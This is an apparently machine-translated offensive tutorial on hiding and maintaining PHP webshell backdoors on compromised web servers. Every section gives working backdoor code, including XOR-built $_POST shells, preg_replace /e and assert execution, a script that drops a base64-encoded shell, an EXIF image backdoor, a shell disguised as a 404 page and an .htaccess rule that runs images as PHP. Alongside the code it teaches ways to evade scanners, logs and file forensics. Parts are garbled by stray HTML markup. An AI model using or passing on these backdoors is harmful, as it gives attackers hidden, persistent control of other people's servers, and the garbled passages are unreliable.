PHP backdoor hiding and maintenance skills

000 preface after a successful test, we usually want to keep the privilege longer. the work of leaving a backdoor is crucial. Generally, the backdoor layout includes but is not limited to database permissions, WEB permissions, system user permissions, and so on. this article describes some ideas hidden from the public backdoors. take PHP-

0 × 00 preface

After a successful test, we usually want to keep the privilege longer. the work of leaving a backdoor is crucial. Generally, the backdoor layout includes but is not limited to database permissions, WEB permissions, system user permissions, and so on. this article describes some ideas hidden from the public backdoors.

Taking PHP-WEBBACKDOOR as an example

The most common backdoor may be written like this.

 

Or

 

Of course, this is only different from the called functions. for PHP disabled functions, find them in php. ini: disable_functions.

However, there are also many ways for O & M to intuitively find our shell, such

◆ An exception was found during file backup comparison by file name/modification time/size

◆ WEBSHELL scan scripts, such as Scanbackdoor. php/Pecker/shelldetect. php and various scanners

◆ Access. log is used to find the backdoor

◆ Or, we will be blocked by WAF for a test sentence, and a warning log, etc.

For common detection methods, summarize the following seven common methods to hide shell

0 × 01 avoidance

Look at the various backdoor scanning code and you will know, leaving a well-known keyword in shell is absolutely impossible.

 

Common keywords include:

◆ System command execution: system, passthru, shell_exec, exec, popen, proc_open

◆ Code execution: eval, assert, call_user_func, base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13

◆ File inclusion: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite

In the past, some friends wittically used $ _ POST [0] ($ _ POST [1]) to execute commands. Unfortunately, it is still difficult to escape the scanner's eye, but the construction method is infinite in Vientiane.

Tudouya provides [a construction technique] (http://www.freebuf.com/articles/web/33824.html) exploitation on FREEBUF.

?

1 2 3 4 5 6 7 8 9

1. 2.@$_++; // $_ = 1  3.$__=("#"^"|"); // $__ = _  4.$__.=("."^"~"); // _P  5.$__.=("/"^"`"); // _PO  6.$__.=("|"^"/"); // _POS  7.$__.=("{"^"/"); // _POST  8.${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);  9.?>

Construct and generate, of course, too intuitive to write

 

Then fill in some common code for disguise. a simple "kill-free" shell sample will appear.

 

Run the command correctly and bypass the common scanner. you can also use it to write a new temporary shell.

 

0 × 02 features

Using syntax features to execute commands is also an interesting method. using the syntax features of php when processing variables, it will analyze whether the data in double quotation marks contains variables (and parse their values)

Eg .:

$ {@ Eval (phpinfo ())}

{} The variable content in double quotation marks can be parsed. @: Keep the variable running after an error occurs.

Then we can shake the chart and start to construct a Hidden Backdoor. but here we want to construct the command execution caused by the function. that's right, it's preg_replace.

 

This method has already been blacklisted by the scanner. you can simply modify it.

?

1 2 3 4

1. 2.function funfunc($str){}  3.echo preg_replace("/(. + ?) <\/Title>/ies "</code> <code class =" java plain ">, </code> <code class = "java string"> 'funfunc ("\ 1") '</code> <code class = "java plain">, $ _ POST [</code> <code class = "java string"> "cmd" </code> <code class = "java plain">]); </code> <code class = "java value"> 4 </code> <code class = "java plain">.?> </Code> </td> </tr> </tbody> </table> <p>, not Found </p> <p style = "TEXT-ALIGN: center"> </p> <p> The execution method is obvious, {$ {phpinfo ()} after regular expression matching ()}} code execution is triggered when funfunc is passed in </p> <pre> </pre> funfunc ("{$ {phpinfo ()}}") <p> another method </p> <pre> </pre> <? Php @ assert ("\ $ arr = \" ". $ _ GET ['cmd']." \ ";");?> <P style = "TEXT-ALIGN: center "> </p> <strong> 0 × 03 inclusion </strong> </p> <p> File inclusion is a method that everyone has played, only include and tips </p> <p> A common file may contain only one include file containing a txt or jpg file, or even a Inclusion vulnerability, but the scanner is easy to detect, more include files are also easy to detect </p> <p> Check this script </p> <pre> </pre>? <Table cellspacing = "0" cellpadding = "0" border = "0"> <tbody> <tr> <td class = "gutter"> 1 2 3 4 5 6 7 8 9 </td> <td class = "code"> <code class = "java value"> 1 </code> <code class = "java plain">. <? Php </code> <code class = "java value"> 2 </code> <code class = "java plain">. </code> <code class = "java keyword"> if </code> <code class = "java plain"> (</code> <code class = "java color1"> @ isset </code> <code class = "java plain"> ($ _ GET [content]) </code> <code class = "java value"> 3 </code> <code class = "java plain">. {</code> <code class = "java value"> 4 </code> <code class = "java plain">. $ fp = fopen (</code> <code class = "jav A string "> 'readme '</code> <code class =" java plain ">, </code> <code class = "java string"> 'W' </code> <code class = "java plain"> ); </code> <code class = "java value"> 5 </code> <code class = "java plain">. file_put_contents (</code> <code class = "java string"> 'readme '</code> <code class = "java plain">, </code> <code class = "java string"> "<? Php \ r \ n "</code> <code class =" java plain "> ); </code> <code class = "java value"> 6 </code> <code class = "java plain">. </code> <code class = "java color1"> @ file_put_contents </code> <code class = "java plain"> (</code> <code class = "java string "> 'readme' </code> <code class =" java plain ">, $ _ GET [content], FILE_APPEND); </code> <code class = "java value"> 7 </code> <code class = "java plain">. fclose ($ fp); </code> <code class = "j Ava value "> 8 </code> <code class =" java plain ">. require </code> <code class = "java string"> 'readme '</code> <code class = "java plain"> ;} </code> <code class = "java value"> 9 </code> <code class = "java plain">.?> </Code> </td> </tr> </tbody> </table> <p> solves some problems. The required shell can be generated as needed, </p> <p style = "TEXT-ALIGN: center"> </p> <p> Unfortunately, file_put_contents and other functions are too sensitive, it is also easy to scan and discover </p> <p> code generation method to create a shell, which is generated with access. </p> <pre> </pre> <? Php @ fputs (fopen (base64_decode ('cgx1z2lux20ucghw'), w), base64_decode ('samples/Pg = '); <p >?> </P> <p> Some scanners can be avoided, but this mode is also quite eye-catching. The new files generated must also be simply hidden to avoid scanning and killing. </p> <p> of course, the new concepts such as heuristic are not taken into account </p> <p> if this method cannot meet the requirements, witty attackers refresh images again </p> <pre> </pre> <? Php $ exif = exif_read_data ('./lol.jpg'); preg_replace ($ exif ['make'], $ exif ['model'], '');?> <P> reference: a backdoor hidden in JPG Image EXIF </p> <p> This time, you do not need to simply copy/B to generate an image horse, it is equally feasible to borrow the specific identifier of the preg_replace execution file </p> <p style = "TEXT-ALIGN: center "> </p> <p> Call to undefined function exif_read_data () </p> <p> php needs to be modified. ini, extension = php_exif.dll </p> <p> Change the loading order to the end of extension = php_mbstring.dll </p> <p style = "TEXT-ALIGN: center "> </p> <p> we can see that this image backdoor uses the preg_replace \ e parameter to parse and execute php variables, and uses base64 encoding, finally, a complete shell is combined based on the file ID, which is a small reminder for children's shoes hidden in the backdoor. </p> <P> of course, as long as there are include points, the forms of the contained files are diverse, and even include error_log (although it may be worth considering closing), only unexpected... </P> <strong> 0 × 04 hiding </strong> </p> <p> to prevent visitors from discovering the existence of backdoors, smart Security researchers will also learn what they say </p> <pre> </pre>? <Table cellspacing = "0" cellpadding = "0" border = "0"> <tbody> <tr> <td class = "gutter"> 1 2 3 4 5 6 7 8 9 10 11 </td> <td class = "code"> <code class = "java value"> 1 </code> <code class = "java plain">. <! Doctype html public </code> <code class = "java string"> "-// IETF // dtd html 2.0 // EN" </code> <code class = "java plain ">></code> <code class =" java value "> 2 </code> <code class =" java plain ">. <pead> </code> <code class = "java value"> 3 </code> <code class = "java plain">. <title> </code> <code class = "java value"> 404 </code> <code class = "java plain"> Not Found 1.      2.    Not Found  3.    The requested URL was not found on this server.   4.      5.      6. 7.    @preg_replace("/[checksql]/e",$_POST['cmd'],"saft");  8.?>

With the help of the above html rendering, browsing the page has begun to disguise 404 to confuse the audio and video

However, visitors cannot hide log analysis. to better hide a large number of logs, construct the following script:

?

1 2 3 4 5 6

1. 2.    header('HTTP/1.1 404');  3.    ob_start();  4.    @fputs(fopen(base64_decode('cGx1Z2luX20ucGhw'),w),base64_decode('PD9waHAgQGFzc2VydCgkX1BPU1RbJ2NtZCddKTs/Pg=='));  5.    ob_end_clean();  6.?>

The access is actually 404. that's right. The same is true in the log.

However, the current directory has generated the script to be connected.

0 × 05 obfuscation

We should know that the kids shoes that have used the weevely tool generate a kill-free shell like this.

?

1 2 3 4 5 6 7 8 9 10

1. 2.    $penh="sIGpvaW4oYXJyYgiXlfc2xpY2UoJGEsgiJGMoJGEpLTgiMpKSkpgiKTtlY2hvICc8LycgiuJgiGsugiJz4nO30=";  3.    $kthe="JGEpPjgiMpeyRrPSgidwcyc7ZWNobyAnPCcgiugiJGsuJz4nOgi2V2YWwoYgimFzZTY0X2giRlY2gi9kgiZShwcmVn";  4.    $ftdf = str_replace("w","","stwrw_wrwepwlwawcwe");  5.    $wmmi="X3JlcgiGxhY2UgioYXgiJyYXkoJy9bXlx3PVgixzXS8nLCgicvXHMvJyksIGFycmF5KCcnLCcrgiJyk";  6.    $zrmt="JGM9J2NvdWgi50JzskgiYT0gikX0NgiPT0tJRgiTtpZihyZXNldCgkYSk9PSgidvbycggiJgiiYgJGMo";  7.    $smgv = $ftdf("f", "", "bfafsfef6f4_fdfefcodfe");  8.    $jgfi = $ftdf("l","","lclrlelaltel_functlilon");  9.    $rdwm = $jgfi('', $smgv($ftdf("gi", "", $zrmt.$kthe.$wmmi.$penh))); $rdwm();  10.?>

This is what follows the connection under the terminal

Ps: I forgot to modify the TERMINAL CODE :(

The kill-free method is to generate random name variables in a fixed area, and then use str_replace to splice base64_decode to execute the command.

Of course, this is to hide the audio and video at the code level to escape the scanner

More common methods for audio/video recognition:

◆ File modification time

◆ Rename the file to the uploaded folder, which makes it impossible to see the file exception

◆ Disguised processing of file size (at least looks like a normal script)

◆ Select the hiding path and minimize access

◆ Malformed directory % 20

Space directories are relatively easy to find.

0 × 06 parsing

Use. htaccess to add resolution backdoors

For example:

1. AddType application/x-httpd-php. jpg

Take weeverly as an example.

0x07 mixture

To sum up the above methods, most of them are just a process of constructing vulnerabilities. the code constructed by vulnerabilities can be amazing, and the backdoor can be amazing. you can write fine and graceful statements, or you can make simple and rude statements, but they are applicable to different occasions. it is not difficult to construct your own Hidden shell if you can integrate your ideas well. the above is just a summary of experience. you may have interesting ideas and hope to give me some advice.